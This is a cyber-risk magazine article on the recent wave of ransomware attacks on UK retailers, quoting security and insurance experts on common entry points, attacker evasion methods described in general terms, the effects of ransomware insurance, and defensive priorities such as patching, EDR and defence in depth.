Ransomware incidents continue to rise, driven by compromised perimeter security and remote desktop products and, as a string of retailers will attest, no company is immune. Martin Allen-Smith investigates

A wave of cyber attacks swept through the UK retail sector in recent weeks, starting with Marks & Spencer, whose systems were crippled by ransomware, halting contactless payments and online orders. The Co-op Group quickly followed, shutting down parts of its IT network in response to a separate breach. Harrods also came under attack soon after, though it appears to have avoided the worst, with no ransom reported.

Ransomware remains one of the most persistent and financially damaging cyber threats facing organisations today. The financial impact of these incidents is becoming harder to ignore. Marks & Spencer’s ransomware breach, for example, is estimated to result in a £300 million hit to operating profits this year.

While the methods used by attackers continue to evolve, recent data shows that the primary points of entry often remain consistent – most notably exposed remote services, misconfigured infrastructure, and compromised user credentials. Rishi Baviskar, global head of cyber risk consulting at Allianz Commercial, says that in perimeter defences, the most common weak points are unsecured, unpatched or misconfigured network components that are exposed to the internet. RDP, VPN and firewall infrastructures are common targets due to known vulnerabilities.

“Ransomware actors continue to focus heavily on exploiting...human error and psychology,” he explains. “Social engineering and phishing – including smishing, instant messaging and malvertising – often leads to revealing users’ login credentials. The weak or stolen compromised credentials allow attackers to bypass perimeter security.”

The 2025 Sophos Active Adversary Report detailed attacker behaviour and techniques from over 400 managed detection and response, and incident response cases, and found that 56 per cent of attackers gained initial access to networks by exploiting external remote services in 2024 (including edge devices such as firewalls and VPNs), by leveraging valid accounts – essentially ‘logging in’ rather than ‘breaking in’.

The combination of external remote services and valid accounts aligns with the top root causes of attacks. For the second year in a row, the report found that compromised credentials were the number one root cause of attacks (41 per cent). This was followed by exploited vulnerabilities (22 per cent) and brute force attacks (21 per cent).

Katie Inns, head of attack surface management at S-RM, says recent years have seen threat actors move away from phishing as an initial access vector to instead exploit vulnerabilities in unpatched internet-facing systems. Almost 75 per cent of the incidents dealt with by the consultancy in 2024 involved initial access via the exploitation of a vulnerability in public-facing infrastructure or through a remote access solution without multi-factor authentication. “This is likely due to the speed and success rate with which exploitation of these vulnerabilities can provide,” she explains. “Threat actors are actively searching for vulnerable VPN endpoints and other remote access solutions that can provide a direct route into an organisation’s internal network.

“These can also be solutions that were deployed in a rush during the pandemic, meaning security was considered as an afterthought – if even considered at all.”

Adaptive cyber security

To address these risks, organisations must reassess the resilience of their remote access infrastructure and legacy systems. As the volume of remote and hybrid working set-ups continues to rise, so, too, does the exposure to cyber risk.

Dr Jason Nurse, reader in cyber security at the University of Kent, says organisations need to keep better track of which devices have access to their networks, and manage the risk appropriately. “It’s surprising how many businesses still don’t have a clear idea of what remote devices can connect to their network,” he explains, adding that security frameworks and insurance assessments are having to work extra hard to keep pace with the threat and adapt to the rise in ransomware claims.

“Security frameworks are emphasising the importance of prioritising key security controls that can mitigate ransomware attacks and lessen the significance of the harm encountered,” Nurse says. “Insurance assessments are adopting a similar approach, though they are often informed more by the claims they have seen. We’ve even seen some insurers move ransomware coverage from basic cyber insurance policies to add-ons, to help manage risk exposure.”

Daniel Woods, principal security researcher at insurer Coalition, insists that insurers are stepping up their game in identifying vulnerabilities and in supporting insureds.

“Given that software vulnerabilities are the second most common IAV, it becomes critical to identify vulnerabilities that threat actors are exploiting. Unfortunately, common vulnerabilities and exposures surged to over 40,000 in 2024 – a 38 per cent increase from 2023 – providing threat actors with over 3,000 new vulnerabilities per month.

“Insurers need to use AI and expert judgment to identify the most risky vulnerabilities and proactively notify their customers,” Woods adds.

As the threat landscape evolves, insurers and organisations alike must balance risk mitigation with realistic expectations about how cyber hygiene can impact policy coverage and incident outcomes. Underwriting ransomware insurance policies is largely data-driven in its approach; however, enterprise ransomware is still a relatively nascent threat.

Timothy West, director of threat intelligence and outreach at WithSecure Intelligence, points to the double-edged sword of insuring these types of events. “We have noted an increasing proportion of ransomware victims are smaller organisations, based [on information] posted to data leak sites (where extortion has failed for example). Ransomware insurance can, of course, give victims the means to meet extortion demands, which prevents them from being counted in data leak site statistics.

“From this perspective there is an argument that ransomware insurance may actually fund, and fuel, ransomware actors... We also note that ransomware actors are certainly responsive to ransomware insurance; there is evidence that actors seek evidence of insurance and adjust their ransom demands in accordance with the policy.”

As well as managing their internal risks, businesses must now scrutinise their external dependencies, recognising that vulnerabilities may be inherited from partners and service providers. Allianz Commercial’s Baviskar says attackers are finding new ways to blend in and disable defences. “To make it harder to detect and remove malicious code...attackers are using fileless malware execution methods, running scripts and commands directly in memory to avoid disk-based detection.

“They also manipulate the legitimate, native operating system tools and trusted administrative software – a technique known as ‘living off the land’. Complex obfuscation on payloads, scripts and C2 comms includes multi-layered encryption, custom encoding schemes, and polymorphism. Other obscure functionalities include command-line arguments, API hooking evasion (blinding), tampering and disabling or removing the EDR directly. AI is also being used by attackers to create adaptive malware that dynamically alters its behaviour to improve its chances of evasion.”

As threat actors grow increasingly adept at concealing their presence, defenders must take a more holistic, layered approach to cyber security that factors in threat intelligence, behavioural analytics, and resilient system design.

Against this backdrop, which technologies or practices show the most promise in reducing the ransomware threat? WithSecure Intelligence’s West says the best advice for most ‘typical’ organisations is simply to do the basics well.

“Organisations should employ proactive technologies and processes for awareness and reduction of threat surface – namely intelligence-led exposure management products and services, user education, and strong patching processes. Organisations should also employ effective reactive/response technologies to ensure that in the event of an intrusion they are well equipped to respond quickly and effectively. This will consist of the usual suspects, such as endpoint protection, EDR and effective and tested response processes.

“This is the foundation upon which further, more advanced and complex, technologies can be deployed – such as deception technologies, internal honeypots and canaries. These advanced tools show promise as effective countermeasures, particularly in cloud environments, however, they cannot be considered a ‘silver bullet’ and shouldn’t replace a robust and resilient defence in-depth approach.”

Defence in-depth remains the guiding principle for managing cyber risk. And with attack windows shrinking and business operations becoming more digitised, the ability to detect and respond rapidly has never been more critical.

As John Shier, field CISO at Sophos, says: “While attacker dwell times are still measured in days, defenders must prioritise detection and response. After initial access, organisations only have three days before data gets stolen in ransomware, data extortion and data exfiltration attacks. In addition, 83 per cent of ransomware attacks also occur outside of local business hours, and only 2.7 hours before ransomware is launched. Without a strong understanding of what normal looks like, coupled with continuous proactive monitoring, many organisations are missing key signals that could prevent the worst outcomes.”




This article was published in the Q2 2025 issue of CIR Magazine.

View as PDF

Contact the editor